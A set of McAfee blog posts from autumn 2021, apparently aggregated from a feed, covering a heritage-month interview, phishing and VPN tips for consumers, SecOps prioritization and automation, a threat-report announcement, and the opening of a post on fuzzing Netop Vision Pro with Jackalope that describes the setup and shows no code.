Each year, Americans observe National Hispanic Heritage Month from September 15th to October 15th, by celebrating the contributions and importance...

The post 2021 Hispanic Heritage Month Pt. 1: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.


Each year, Americans observe National Hispanic Heritage Month from September 15th to October 15th, by celebrating the contributions and importance of Hispanics and Latinos to the United States.

The 2021 Hispanic Heritage Month theme invites us to celebrate Hispanic Heritage and to reflect on how great our tomorrow can be if we hold onto our resilience and hope. This year’s theme also encourages us to reflect on the contributions Hispanics have made in the past and will continue to make in the future.

I spoke with Sr. Principal Engineer, Ismael Valenzuela about how his heritage played a role in who he is today, advice for future generations and more. Read our conversation below.

What do you enjoy most about your heritage and what is one of your favorite memories growing up?

I was born and raised in Malaga, Spain, and spent a good part of my professional career in my home country until I moved to the US in 2014. My favorite memories are those shared with my family and friends, enjoying some of the amazing food we have in Malaga, and the beautiful warm weather we have all year long. Enjoying a football game (we call it soccer here in the US, but it’s really football, since it’s played with the foot!) with the friends on a Friday evening or simply a walk by the beach to enjoy the fresh breeze of the Mediterranean sea. Those are some of my favorite memories.

How have Hispanic/LatinX individuals helped contribute to where you are today in life and career?

I was very fortunate to have a business angel at a very young age, who happened to be an experienced Argentinian businessman. He recognized my passion for infosec (it wasn’t called cyber back then) and provided me with the support needed to make my ideas and projects a reality. Thanks to him I was able to co-found one of the first infosec consulting businesses in Spain in 2000, and I’m still very grateful for that opportunity. My experience in the US has not been very different. Since 2014 I’ve had the pleasure to work very closely with super talented colleagues from our McAfee Enterprise teams in Argentina and Chile. Some of them were a tremendous help when I established myself in the NY area, and they continue to be great co-workers and friends, who I admire and look up to.

Tell us about your journey to a career in technology and how your heritage played a role to where you are today?

I think that Hispanic/LatinX are curious by nature. And curiosity is the basis for the ‘hacker’ culture. And yes, I call it hacker culture, referring to the original meaning and roots of the word ‘hacker’, which connoted technical virtuosity and playfulness (from Walter Isaacson, The Innovators. Great book by the way!). I think I’ve always had that curiosity, especially since I was a kid and had my very first computer, a PCS 286 with just plain old MS-DOS. From that moment on, I knew what I wanted to work with, for the rest of my life. By the time I was in high school I was already programming in several languages, most self-taught, including BASIC, Assembly, and Pascal, and was already doing little applications for some family and friends with tools like DBase III and Clipper. It was a lot of fun! It wasn’t until I started college that I started to dig deeper into operating systems, networking, and lower-level languages like C. When I was introduced to Linux, I immediately fell in love with it, and this increased my curiosity. I started to learn more about how the Internet worked and one thing led to the other. Before I knew it, I was reading guidelines on security, hacking, protocols, asking questions on IRC channels (Slack is essentially IRC for millennials, for those that didn’t know), and setting up my labs at home to play more with the tools I was learning about. Shortly after I landed my first job, as both a web programmer and a system administrator, I found some serious security vulnerabilities in a government network, that happened to make the news, which led me to setup my own consulting business in 2000 with my Argentinian partner. And the rest is history from there! (it’s on LinkedIn too)

What are the three most important things that people should know about your culture?

If I must pick three, I’ll go with these:

1) we love food!

2) we love having long meals with friends and family!

3) we love having food outdoors!

Is there a tradition or celebration that you hope that your descendants maintain?

Yes, I’m working on making sure my kids learn to eat a wide variety of healthy and fresh food, instead of processed and refined stuff. And I hope their kids do the same! Did I say I like food?

What do you hope to pass on to future generations?

My hope is that current and new generations realize that true success is more than just a title, a professional achievement, or a prestigious career, whether it is in IT, or anything else. We live in a world that puts too much emphasis in personal egos, competitiveness, and social status. However, most often those pursuing these goals end up with anxiety, health issues, and disappointment. So, we need to start taking some of that pressure off the young ones and emphasize more the values and principles that can make you happy in the long term, things like a good work ethic, resilience to deal with setbacks, patience to acquire the right training and work through problems, empathy for others, balance to take care of yourself and those you love, and respect for everyone’s opinions and ideas. It’s not all about cyber!

As the country continues to grow more diverse, what advice would you give to young Hispanic/LatinX individuals interested in starting a career in cybersecurity?

Don’t be afraid to ask for help or to ask for a mentor. I was very fortunate to have an amazing mentor that taught me the fundamentals of business and a good work ethic. Having technical skills is important, but it’s equally important to develop other soft skills, like the ability to communicate clearly, to think strategically, to follow through with your projects, and of course the importance to stick to your values and your principles, and to care about the people you interact with. Try to grow your network, and don’t limit yourself to a certain age group, background, or ethnicity. Embrace diversity and realize that there’s always something new to learn from everyone you work with. Stay humble, and never think you’re the smartest in the room. Not only will you be wrong, but you’ll be missing the opportunity to learn and grow. If you want to start a career in cybersecurity specifically, see what classes you can take in your area, and what local groups or conferences are available. One of the few positive things we have with COVID is that most of the conferences have moved to an online format. Many like SANS Summits allow you to join Slack or Discord channels where you can interact with practitioners and security professionals. Also the SANS Institute (from which I’m part of the faculty), have initiatives like the CyberStart America that is a free national program for high school students to learn and master cybersecurity. These can be a gateway to the industry and can lead to college scholarships. And if you need more help or advice, don’t hesitate to contact me on my Twitter account: @aboutsecurity. I can help to point you in the right direction.

What are some of your ideas on how to attract more Hispanic/LatinX individuals to cybersecurity?

I think one of the things we need to do as professionals is to demystify what we do in this field. We need to start admitting that this is not rocket science. It is true that it’s a fast-paced field, and that it can seem overwhelming at times, but nothing that we do is too hard that anyone should feel intimidated to try to break in. We all learned over time, and in many cases through a succession of failures and recoveries. We all have a responsibility, from corporations to professionals, to lower the entry barriers and give more opportunities. One way to do this is to make more information available in Spanish. In fact, I’ll be chairing a talk track in Spanish at the 2021 SANS Threat Hunting Summit on October 7th and I’ll be hosting breakout spaces for the attendees to network with and to continue the conversation in Spanish as well. So, if you’re reading this, you have no excuses!

The post 2021 Hispanic Heritage Month Pt. 1: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.

Do your part and #BeCyberSmart with these online safety tips Mon, 04 Oct 2021 13:33:32 +0000

We hope you’ve enjoyed Cyber Awareness month. This year’s theme asked us all to do our part to stay safer online. The idea is that if we each...

The post Do your part and #BeCyberSmart with these online safety tips appeared first on McAfee Blogs.


We hope you’ve enjoyed Cyber Awareness month. This year’s theme asked us all to do our part to stay safer online. The idea is that if we each take steps to secure our lives online, then together we all contribute to creating a safer, more secure internet. Of course, it’s our job to help you #BeCyberSmart. With that in mind, we’ve pulled together all the safety tips we featured in October. From family security to protecting your latest smart home gadgets, they’re all here and organized by theme. So take a look below and let’s all do our part today, tomorrow, and in the year to come! 

#BeCyberSmart at any age 

10 quick tips for keeping the whole family safe 

Online security for senior citizens 

A quick list of tips for protecting kids on apps and social networking 

How to protect baby’s first digital footprints 

Millennials are major targets for identity theft. Check out this quick guide for protecting identity online 

Ways for online gamers to #BeCyberSmart. 

Fight the Phish! 

#Phishing is a common #scam that pops up in emails, DMs, and texts where crooks try and get you to click sketchy links. Learn how to spot them. 

#phishing quick tips:

  • A common attack is a fake shipment alert, where a text pretends to come from a legitimate carrier or delivery service. #BeCyberSmart, don’t click on any links. Go to the company’s webpage and follow up there, especially if you weren’t expecting a package! 
  • #Phishing also happens on voicemail. Crooks can pose as IRS agents during tax time or pretend to represent a bank, all to get your Social Security number or other info. #BeCyberSmart, hang up and call the organization in question directly to see if the issue is legit. 
  • With #phishing attacks, something can smell fishy and look fishy too. Spelling errors, clunky designs, and logos that don’t look quite right are often tell-tale signs that an email or message is fake. #BeCyberSmart, if something doesn’t look right, don’t click. 
  • By playing on people’s emotions with fake job offers or deals on hot holiday items, crooks create links to phony sites designed to steal personal info. If it sounds too good to be true, it probably is. #BeCyberSmart, don’t click. 
  • Does the message you just got from a friend or coworker seem a little … off? If so, this may be a #spearphishing attack where hackers pose as people you know to steal personal info from you. When in doubt, don’t click that link.  
  • You won! A weekend getaway! Tickets to opening day! A shopping spree! Or did you? Messages like these, whether online or in voicemails can be #phishing scams. #BeCyberSmart, don’t share your info without seeing if the operation is truly on the up-and-up. 

Explore, Experience, Share 

Securing your mobile phone. 

Protecting your #socialmedia accounts from hacks and attacks. 

Keeping the whole family safer 

Spotting fake news and misinformation 

How to avoid oversharing online. 

Managing your personal photos online safely. 

Interested in starting a podcast? Here are some tips to get you started. 

Check out some tips for keeping your family safe when you hit the road with your phones, tablets, and laptops 

Have smart home devices like a doorbell or smart lightbulbs? See how you can enjoy it all safely 

Making online protection a priority 

Staying safe while banking online 

App scams aimed at kids 

Take a look at some of the ways you can improve your privacy 

Using payment apps safely 

Protecting kids from identity theft 

Let’s talk online shopping and ways you can score some great deals safely during a time of year when hackers break out some of their oldest (yet effective) tricks 

Thanks for celebrating Cyber Awareness month with us this October. More importantly, we hope you’re able to take the tips above and not only make your life safer but also the lives of friends and family as well. After all, we all need to do our part to #BeCyberSmart and protected online. 

The post Do your part and #BeCyberSmart with these online safety tips appeared first on McAfee Blogs.

McAfee Enterprise Advanced Threat Research Report: Ransomware’s Increasing Prevalence Mon, 04 Oct 2021 04:01:48 +0000

The increasing prevalence of ransomware tops the findings of the McAfee Enterprise Advanced Threat Research Report: October 2021 released today....

The post McAfee Enterprise Advanced Threat Research Report: Ransomware’s Increasing Prevalence appeared first on McAfee Blogs.


The increasing prevalence of ransomware tops the findings of the McAfee Enterprise Advanced Threat Research Report: October 2021 released today.

While ransomware continues to hold cybersecurity headlines hostage, so much has changed since our last threat report. After shutting down the Colonial Pipeline, DarkSide created the appearance of walking away after attracting government scrutiny, thinking we would miss the (alleged) connection to BlackMatter.

Our Advanced Threat Research team also made a move to McAfee Enterprise, a newly dedicated Enterprise Cybersecurity company. While we will no longer publish our work under McAfee Labs, you can still find and follow our research on our new McAfee Enterprise ATR Twitter feed: @McAfee_ATR.

We’ve shifted the primary focus of our new Threat Report from frequency to prevalence. Our team is now paying attention to how often we see the threat around the globe and, more importantly, who it targets.

While DarkSide attempted to step out of the spotlight, other ransomware families including REvil/Sodinokibi, Ryuk, and Babuk wreaked havoc from among DarkSide’s shadow. In response, this threat report offers a deep dive into ransomware’s increasing prevalence including ransomware family detections and the delta of data between open-source intelligence and telemetry.

Our McAfee Enterprise team also offers research and analysis on relevant threat topics including:

  • Cloud Threats – Continuing threat trends targeting a remote workforce
  • B Braun – Our team’s uncovering of healthcare vulnerabilities in a globally used infusion pump
  • MITRE ATT&CK Techniques – Top techniques used in Q2 2021
  • How to Defend – Resources designed to help your enterprise defend itself from the latest threats

Once you’ve consumed the research and findings in this report, don’t forget our MVISION Insights preview dashboard which updates and profiles the most prevalent threats, offering a knowledge base that includes targeted countries and sectors along with proactive solutions to help your enterprise stay ahead of emerging threats.

We welcome your feedback about this threat report and what you would like to see in the next report.

The post McAfee Enterprise Advanced Threat Research Report: Ransomware’s Increasing Prevalence appeared first on McAfee Blogs.

The Art of Ruthless Prioritization and Why it Matters for SecOps Wed, 29 Sep 2021 16:19:44 +0000

The security operations center (SecOps) team sits on the front lines of a cybersecurity battlefield. The SecOps team works around...

The post The Art of Ruthless Prioritization and Why it Matters for SecOps appeared first on McAfee Blogs.


The security operations center (SecOps) team sits on the front lines of a cybersecurity battlefield. The SecOps team works around the clock with precious and limited resources to monitor enterprise systems, identify and investigate cybersecurity threats, and defend against security breaches.

One of the important goals of SecOps is a faster and more effective collaboration among all personnel involved with security. The team seeks to streamline the security triage process to resolve security incidents efficiently and effectively. For this process to be optimized, we believe that ruthless prioritization is critical at all levels of alert response and triage. This ruthless prioritization requires both the processes and the supporting technical platforms to be predictive, accurate, timely, understandable for all involved, and ideally automated. This can be a tall order.

Alert Volumes Have the SecOps Team Under Siege

Most SecOps teams are bombarded with an increasing barrage of alerts each year. A recent IBM report also found that complexity is negatively impacting incident response capabilities. Those surveyed estimated their organization was using more than 45 different security tools on average and that each incident they responded to required coordination across around 19 security tools on average.

Depending on the enterprise size and industry, these tools may generate many thousands of alerts in periods ranging from hours to days, and many of them may be redundant or no value. One vendor surveyed IT professionals at the RSA conference in 2018. The survey results show that twenty-seven% of IT professional’s receive more than 1 million security alerts daily[1].

The cost and effort of reviewing all of these alerts are prohibitive for most organizations, so many are effectively deprioritized and immediately ignored. Some surveyed respondents admit to  ignoring specific categories of alerts, and some turn off the security alerts associated with the security controls that generate much of the alert traffic. However, the one alert you ignore may have resulted in a major data breach to the organization.

Tier 1 SecOps analysts have to manage this barrage of alerts. They are surrounded by consoles and monitors tracking many activities within enterprise networks. There is so much data that incident responders cannot process but a fraction of it. Alerts pour in every minute and ratchet up the activity level and the attendant stress throughout the day.

A Tier 1 SecOps analyst processes up to several hundred alerts in a day that require quick review and triage. As the alert is logged, the Tier 1 SecOps analyst usually goes through a checklist to determine further prioritization and determine if further escalation is required.  This can vary substantially depending on the automation and tools which support their efforts.

Once the alert is determined to be potentially malicious and requires follow-up it is  escalated to a Tier 2 SOC Analyst. Tier 2 SOC Analysts are primarily security investigators. Perhaps only 1% or less are escalated to a Tier 2 SOC analyst for deep investigation. Once again, the numbers can vary substantially depending on the organization and industry.

Security investigators will use a multitude of data, threat intelligence, log files, DNS activity, and much more to identify the exact nature of the potential breach and determine the best response playbook to use. In the case of a severe threat, this response and subsequent remediation must be done in the shortest possible amount of time, ideally measured in minutes if not just a very few hours.

In the most dangerous scenario that a threat actor has executed what is determined to be a zero-day attack, the SOC team works with IT, operations, and the business units to protect, isolate, and even take critical servers offline to protect the enterprise. Zero-day attacks raise the SOC to a war footing, which, if properly and rapidly executed against the team’s playbooks, can help mitigate further damage from what is otherwise previously unknown attack techniques. These require the skill and expertise of advanced security analysts to help assess and mitigate complex ongoing cyberattacks.

Given the barrage of alerts, it is essential to adopt a strategy to fit best the capabilities of your team against a priority-driven process. This allows you to optimize your response to alerts, best manage the resources on the SecOps team, and reduce the risk of a dangerous breach event.

There are several strategic views that SOC leadership can take on how to best approach prioritization. These include data driven strategies using tools like DLP, threat driven strategies to bolster defenses and shorten reaction time to threat vectors active in your industry and geography, and perhaps asset driven strategies, where certain assets will merit enhanced protection and priority driven escalation for alerts. Most organizations find that an integrated mix of these strategies addresses their overall needs.

A Data-Driven Approach to Prioritization

The first approach to prioritization, consistent with the tenets of zero trust, is to take a data-driven approach. Customer data and intellectual property are often at the center of every organization’s most protected jewels. One way to move this into focus within SecOps would be to implement Data Loss Prevention (DLP). Data loss prevention (DLP), per Gartner, may be defined as technologies that perform both content inspection and contextual analysis of data sent via messaging applications such as email and instant messaging, in motion over the network, in use on a managed endpoint device, and at rest in on-premises file servers or in cloud applications and cloud storage. These solutions execute responses based on policy and rules defined to address the risk of inadvertent or accidental leaks or exposure of sensitive data outside authorized channels.

Enterprise DLP solutions are comprehensive and packaged in agent software for desktops and servers, physical and virtual appliances for monitoring networks and email traffic, or soft appliances for data discovery. Integrated DLP works with secure web gateways (SWGs), secure email gateways (SEGs), email encryption products, enterprise content management (ECM) platforms, data classification tools, data discovery tools, and cloud access security brokers (CASBs).

A Threat-Driven Approach to Prioritization

Threat intelligence focuses on defense and triage priority from the data to external threat actors and the techniques they are most likely to utilize. Threat intelligence can give the SOC the data they need to anticipate threat actors and the Tactics, Techniques, and Procedures (TTPs) these threat actors might use. Further, threat intelligence can provide a path to recognize the often unique Incidents of Compromise (IOCs) that can uniquely identify a type of cyberattack and the threat actor that uses them. The goal, of course, is to identify and prevent these most likely attacks before they occur or stop them rapidly upon detection.

The consolation prize is also a good one. If you cannot prevent an attack, you must be able to identify an unfolding threat. You must identify the attack, break the attacker’s kill chain, and then stop the attack. Threat intelligence can also help you assess your environment, understand the vulnerabilities that would support the execution of a particular kill chain, and then let you move rapidly to mitigate these threats.

In August of 2020, researchers from Dutch and German universities[2] co-presented at the 29th Usenix conference on a survey they conducted. The survey showed that there is less overlap between threat intelligence sources than most of us would expect. This includes both open (free) and paid threat intelligence sources.  The moral of the story is that large organizations likely need a wide set of threat intelligence data from multiple sources to gain an advantage over threat actors and the attack vectors they are likely to use. And these sources must be integrated into a common dashboard where SecOps threat investigators can rapidly leverage them.

An Asset-Driven Approach to Prioritization

Of course, certain assets are more valuable than others. This can be a function of the data they may uniquely hold, and the access to network, applications, and information resources frequented by their owners, or the level of criticality of the asset’s function. For example, the chief financial officer’s laptop may be assumed to be in possession of the most sensitive data, or medical device monitor during surgery or command controller for manufacturing production. Hence they may deserve higher priority in terms of protection.

Optimize Your Prioritization Strategy with MVISION XDR

MVISION XDR provides capabilities leveraging all of these prioritization strategies: data-driven, threat-driven, and asset-driven. On top of this MVISION XDR offers predictive assessment based on global threats likely to target your organization with a local assessment of how your environment can counter the threat. This “before the attack” actionable assessment is powered by the distinct MVISION Insights empowering SOC to be more proactive and less reactive.  Here is a preview of MVISION Insights top ten threat campaigns.  Here are some key prioritization examples delivered in MVISION XDR:

Key MVISION XDR Prioritization Examples


Priority Strategy (ies) Capability Description Benefit & Value
Data-driven Alert based on data-sensitivity Focus on critical impact activity
Threat-driven Automatic correlated threat techniques to derive at likely next steps Gain confidence in the alert less false positives
Threat-driven View trends and threat actors targeting your organization Reduce the universe of threats and actors to those that matter
Asset-driven Tag critical assets for automated prioritization Address threats to critical assets faster

Prioritization Delivers Improved Business Value for the SecOps Team

MVISION XDR can help you implement and optimize your prioritization strategy. Your SecOps team will have the improved triage time they need with prioritized threats, predictive assessment, and proactive response, and the data awareness to make better and faster decisions. To learn more, please review our Evolve with XDR webpage or reach out to our sales team directly.




The post The Art of Ruthless Prioritization and Why it Matters for SecOps appeared first on McAfee Blogs.

Cybersecurity Awareness Month: Taking Charge of Your Safety Online Wed, 29 Sep 2021 12:55:44 +0000

When it comes to crime, what do people worry about most? Having their car stolen? A break-in while they’re not...

The post Cybersecurity Awareness Month: Taking Charge of Your Safety Online appeared first on McAfee Blogs.


When it comes to crime, what do people worry about most? Having their car stolen? A break-in while they’re not at home? Good answers, but not the top answer by a long shot. In this U.S.-based survey, hacker-related crime weighed in at 72%, with a home burglary at 35% and auto theft at 34%, indicating that people’s concerns about cybercrime are very much front and center.  

Taking Charge of Your Safety Online 

The good news is that plenty of cybercrime can be prevented, or at least made less likely, provided you protect yourself online, much in the same way you take steps to protect your car or home. And that’s the focus of this year’s Cybersecurity Awareness Month. With the theme of “Do Your Part. #BeCyberSmart,” it reminds us of how we can take charge of our own safety—the ways we can look out for ourselves and others as we enjoy our time online. 

Throughout October, we’re participating in Cybersecurity Month here on our blogs and across our social media channels, posting a host of ways that you can help keep cybercrooks away from your digital doorstep. Each week, we’ll tackle a different aspect of online protection: 

Week of October 4th: Be Cyber Smart 

Maybe it comes as no surprise to hear it, yet one recent study shows the average person spends nearly eight hours a day online. With that, we’re taking this week to focus on the family, how they spend their time online and how they can be safer when they do. 

Week of October 11th: Fight the Phish! 

Whether they come by email, text, or DM, phishing attacks account for the most common types of reported cybercrime, according to the FBI Internet Crime Complaint Center. This week, we’ll show you how you can indeed fight the phish! 

Week of October 18th: Explore. Experience. Share. 

This sentiment sums up the best of the internet in so many ways. Getting out there, discovering, catching up with friends online. Our focus this week is helping you enjoy it all without any of the bad apples out there spoiling your fun. 

Week of October 25th: Cybersecurity First 

We wrap it up with a look at some of the top priorities so everyone in the family can #BeCyberSmart—online banking, app scams, privacy, identity theft, and more—along with plenty of straightforward tips that can help you stay safer. 

Join us all this month! 

We hope our posts throughout Cybersecurity Awareness Month help you get a little sharper and feel a little safer so you can enjoy your time online, free from hassles or headaches. Look for more from us throughout October! 

The post Cybersecurity Awareness Month: Taking Charge of Your Safety Online appeared first on McAfee Blogs.

Executive Spotlight: Q&A with VP of Products and Marketing, Anand Ramanathan Tue, 28 Sep 2021 17:08:30 +0000

I spoke with Anand Ramanathan, VP of Products and Marketing who brings over 20 years of enterprise SaaS product experience...

The post Executive Spotlight: Q&A with VP of Products and Marketing, Anand Ramanathan appeared first on McAfee Blogs.


I spoke with Anand Ramanathan, VP of Products and Marketing who brings over 20 years of enterprise SaaS product experience ranging from high growth startups to established market leaders. Read the interview below to understand his thoughts on McAfee Enterprise and where he see’s the company going in the coming years.

Q: What is your ideal way to spend a Sunday?

Every ideal Sunday has 3 components:

  1. Starts with keeping the body fit – a game of tennis with close friends.
  2. Spending time with family – making and eating lunch together.
  3. Preparing for the week ahead – planning out my work schedule and prioritizing the actions.

Q: With cybersecurity and AI capabilities expanding at a rapid pace, what will the future look like for companies like McAfee Enterprise in the coming years?

The adversarial landscape has always been a digital cat and mouse game. McAfee Enterprise’s investment in AI over the years has allowed its solution to stay ahead of adversaries and provide industry-best protection for its customers. With adversaries pivoting their techniques at a more rapid pace, it has become imperative for security solutions to leverage the cloud and AI capabilities.

Q: Can you talk about McAfee Enterprise’s history of Insights and how it is used to improve cybersecurity capabilities, including protecting against cyber threats?

Insights was born out of two very simple questions that CISOs get asked: Were we impacted by a given threat? Will our defenses protect us from the threat?

With an increase in security breaches being covered by popular press; board and executive management are becoming more attune with the threat landscape. We are seeing them start to ask the important questions to their security teams.

At McAfee Enterprise, we saw the gap in knowledge within security teams to give quick and efficient answers to the two pivotal questions. And given our depth in threat research and data analytics capabilities, innovated with the industry’s first proactive security solution in MVISION Insights, we feel we can answer the above questions, placing crucial information in the hands of the security teams. The feedback from our customers has been tremendously positive.

Q: What goals and initiatives are you focusing on to drive the company for the rest of 2021 and beyond? What IT capabilities do you have your eye on?

McAfee Enterprise is at the center of three key buzzwords of 2021 – SASE, ZTNA, and XDR. We have been at the forefront of innovating in these areas with the release of MVISION Insights, MVISION Private Access, and MVISION UCE with integrated Remote Browser Isolation. We also have leadership in MITRE based attack detection for endpoint and cloud and MVISION marketplace for security ecosystem integration. We will be continuing this innovation velocity and lead the market with new capabilities on Zero Trust and XDR integration with the security ecosystem. Stay tuned, more to come!

The post Executive Spotlight: Q&A with VP of Products and Marketing, Anand Ramanathan appeared first on McAfee Blogs.

Why Can’t We Automate Everything? Tue, 28 Sep 2021 15:00:49 +0000

You can’t automate every business process. While I love automation and promote the concept, I know its limitations. This viewpoint...

The post Why Can’t We Automate Everything? appeared first on McAfee Blogs.


You can’t automate every business process. While I love automation and promote the concept, I know its limitations. This viewpoint needs to be recognized and observed as more security officials implement automation within their organizations.

I’d estimate that for most enterprises, the first 80 percent of migrating and integrating processes to automation is easy to do. The last 20 percent is hard to accomplish.

This breakdown helps you set realistic expectations about automation. I enjoy how automation saves time by generating useful data through repetition. But right now, data compiled from some activities still require a human being to examine the results and make a decision. You will still need a critical eye from your security operations team or managed security services provider when looking at the useful data or anomalies.

We still need to address the 20 percent and realize that the situation may not be as much of a challenge as we think initially. Here are some examples of what I mean.

Where Automation Needs a Human Touch

Your automation detects and notes that one of your executives is connecting to your network from Russia. How do you know whether that executive is actually in Russia or if someone there is impersonating that executive? For optimal security, there needs to be human interaction to review the information and determine whether to let that person should be allowed to connect.

Or consider when IT officials at a hospital used the McAfee Enterprise ePolicy Orchestrator (ePO) console to automate a deeper level scan of physicians’ laptops. This scan occurred before the physicians began their daily scans by sending over someone from the hospital’s operations department to clean the laptop and comply with HIPAA regulations. To collect the events compiled from the laptops, the IT officials used IBM® QRadar® Device Support Module (DSM) for McAfee Enterprise ePO. This platform integrated from IBM Security™ uses analytics for insights into potential threats to data.

With this setup, whenever an anomaly appeared in QRadar, such as some unusual behavior at the network level, an IT official at the hospital would right-click and add the IP address to a different scan group in ePO through the application programming interfaces (APIs). Automating that initial first pass of scanning the laptop finds these discrepancies quickly. But ultimately humans like IT officials must review the notification and send a message to McAfee Enterprise expert to clean the anomaly from the laptop themselves and confirm the anomaly was removed.

So, it’s hard to automate the 20 percent done by humans in your organization as shown here. But what the 80 percent of easy automation does for the rest of your business processes can outweigh that perceived drawback.

How and Why the 80 Percent Easy Automation Matters More

You can easily find yourself at work engulfed in an ocean of data. Indicators from your automation help you find out what’s important. Activity from the endpoints of your network gives you or an MSSP a view of what’s happening with your data.

Most systems today have everything connected to the internet. The endpoints interact with your network. Having broad visibility and detection across your network — whether it’s looking at DNS logs, proxy logs, traffic and so on — allows you to correlate information and identify what’s taking place right now.

The real-time aspect of automation for data on your network is vital important. Threats to your network depends both on how much time they require to activate and how long before they are detected and remediated. Automation that’s easy to implement helps find attacks quickly with a real-time detection engine that can minimize the damage that takes place.

Experts at McAfee Enterprise and our partners at IBM Security can help with troubleshooting by providing support for the 20 percent automation you can’t fulfill. You can investigate a full lifecycle of endpoint events using McAfee Enterprise MVISION and IBM QRadar integrated together. And you can automate remediation with the IBM Security SOAR (security orchestration, automation and response) platform.

With these tools, you can integrate the data available from threat feeds in one platform for better visibility and context. IBM’s managed security services experts can help you answer questions around how to best configure, administrate and manage endpoint security incidents based on that data collected by automation.

We can also help you learn about other technologies and trends that are happening that our experts deal with every day. Consultants can help you identify how to lower or minimize costs of attacks and breaches as well as work proactively to address these issues. Automation can’t provide you with these resources, but we can.

What to Expect for the Future

We have researchers at work looking how to merge that last hard 20 percent of automation implementation into the 80 percent of easy migration and conversion. For now, accept the notion that automation can handle most tasks for your organization and save you time and costs in the process. And what automation can’t do in those areas, we at McAfee Enterprise and IBM Security can help fill in the gaps.

Learn more about what automation with expert support can do for you by reviewing the features of MVISION Endpoint Security and IBM Managed Security Services. Or schedule a free 30-minute consultation with IBM Security by clicking the “Let’s talk” button on the IBM Managed Security Services homepage.


The post Why Can’t We Automate Everything? appeared first on McAfee Blogs.

Are You Still on the Fence About a Family VPN? Mon, 27 Sep 2021 13:05:44 +0000

Chances are, you’ve heard the term VPN more and more lately but still can’t figure out exactly what it does or if your...

The post Are You Still on the Fence About a Family VPN? appeared first on McAfee Blogs.


Chances are, you’ve heard the term VPN more and more lately but still can’t figure out exactly what it does or if your family needs one. You aren’t alone. The short answer is yes—you need a VPN on your family devices—and here’s why.  

One of the main reasons you’re hearing more about VPNs is that cybercrime and data breaches are skyrocketing—especially since the pandemic. Cybercriminals are devising more inventive ways to grab and misuse your data. Subscribing to a VPN service is one of the most practical and powerful ways consumers can fight back.  

What’s a VPN? 

VPN is an acronym for Virtual Private Network. And while it sounds complicated, it’s not. A VPN is an app you install on family devices to help keep data and online activity secure while using public Wi-Fi. Pretty simple, right? 

How does it work? 

When you connect your computer or phone to a VPN, the service sends your network traffic through the VPN server before going to the public Wi-Fi server. Because a VPN scrambles data, should a bad actor try to access your activity, all they will see is gibberish.  

 A VPN encrypts internet traffic and then bounces it around until it becomes scrambled, helping block geolocation-based tracking and offering more protection than an open network. Encryption makes it harder for cyber crooks to decipher your location, data, and online activity for malicious purposes.  

Benefits of a VPN 

1. Reduces risk on the go.

Anytime you or another family member uses public Wi-Fi—to stream, shop, or game—it’s possible that others can see your traffic. However, a VPN will encrypt your activity so that all a potential hacker will see is gibberish. 

2. Gives kids extra protection.

A VPN is a safeguard if your kids forget to turn off the Wi-Fi auto-connect feature on their phones. This can be a powerful feature if your kids connect to social networks, shopping, banking, or gaming sites throughout the day from locations outside the home.  

3. Restricts data mining. 

A VPN configured correctly can also keep companies from sharing your browsing habits and information with third parties. 

4. Multiple device security.

If everyone in your family has two devices and you have five family members, a bad actor has up to 10 potential entry points to steal your data or instigate a scam. With cybersecurity threats on the rise, a VPN provides security for all users on multiple devices, regardless of their safety habits. 

Top VPN Features 

When shopping for the best VPN for your family, it’s easy to get lost in an ocean of features. Here’s a shortcut to help you with the VPN features best for your family. Look for: 

1. Bank-grade encryption.

A quick search will render dozens of VPN options and not all protect consumers. Approximately 38% of Android VPN apps in the Google Play Store (some free) install malware rather than block it. Another study found that of 283 free VPN providers, 72% included trackers. Because of this standard practice, it’s essential to do your research and choose a VPN that delivers bank-grade encryption. Note: Many free VPNs make their money by sharing your data with third parties.  

2. Unlimited bandwidth.

Choose a VPN that allows you to maintain a secure network connection no matter how much time you spend online. 

3. Efficient speed.

With more work and school now remote, consider choosing a high-speed VPN that improves privacy without sacrificing the quality of your connection. 

4. Access to virtual locations.

Consider a VPN server that shows a different location than your point of entry, a feature that enhances anonymity, location, and browsing history. For example, you may be getting online in the United States, but your VPN server might show you are connected in Italy.  

What’s your digital defense? 

It’s important to note that a VPN does not provide 100% protection from cyber threats. However, to date, it is one of the safest ways your family can simultaneously enjoy the convenience of the internet and reduce risk on public Wi-Fi.

McAfee Total Protection subscribers already have access to unlimited VPN usage. If you haven’t already signed up, now’s a perfect time. McAfee Total Protection provides security for all your devices while your family shops, banks, games, and browses online. 

The post Are You Still on the Fence About a Family VPN? appeared first on McAfee Blogs.

Finding 0-days with Jackalope Mon, 27 Sep 2021 04:01:39 +0000

Overview On March 21st, 2021, the McAfee Enterprise Advanced Threat Research (ATR) team released several vulnerabilities it discovered in the...

The post Finding 0-days with Jackalope appeared first on McAfee Blogs.



On March 21st, 2021, the McAfee Enterprise Advanced Threat Research (ATR) team released several vulnerabilities it discovered in the Netop Vision Pro Education software, a popular schooling software used by more than 9,000 school systems around the world. Netop was very responsive and released several updates to address many of the critical findings, creating a more secure product for our educators and children to use. During any vulnerability research project, as we continue to gain a deeper understanding on how a product works, additional threat vectors become apparent which may lead to additional findings; this proved once again true during the Netop research. In this blog we will highlight an additional finding: CVE-2021-36134, a vulnerability in the processing of JPEG images, on the Netop Vison Pro version 9.7.2 software. The main emphasis will focus on the process and techniques used during blackbox fuzzing of a Windows DLL.


Fuzzing can be a challenging exercise and just knowing where to start can be cause for confusion. There are many different fuzzers on the market, many of them primarily designed to handle open-source projects on Linux. In late 2020 Google’s Project Zero team released a new fuzzer named Jackalope. Jackalope is a coverage-guided fuzzer, meaning it keeps track of code paths during testing and uses that information to guide its future mutations. Jackalope leverages a library called TinyInst for its code coverage and allows for command line parameters related to code coverage to be passed directly to TinyInst. What caught my attention about Jackalope was that it was designed with a blackbox, Windows and MacOS first mentality. It was built to fill a gap in Windows blackbox fuzzing, which has existed for some time and therefore warranted further investigation. During the time of Jackalope’s release, we were working on the Netop Vision Pro research which runs primarily on Windows, so it was logical to test Jackalope to see if we could discover any new vulnerabilities on Netop Vision Pro.


The Jackalope documentation does a great job of explaining the setup and build process to get started. For this setup we set up shop on a Windows 10 fully patched system and compiled Jackalope from the GitHub repo using Visual Studio 2019. In a short amount of time, it was time to test the setup. The repo provides a test binary which can be built with the source and therefore is the best place to understand how the fuzzer works. There are just under a few hundred lines of code, but how it works can be summed up in just a few lines, as seen in Figure 1.

Figure 1 test.cpp

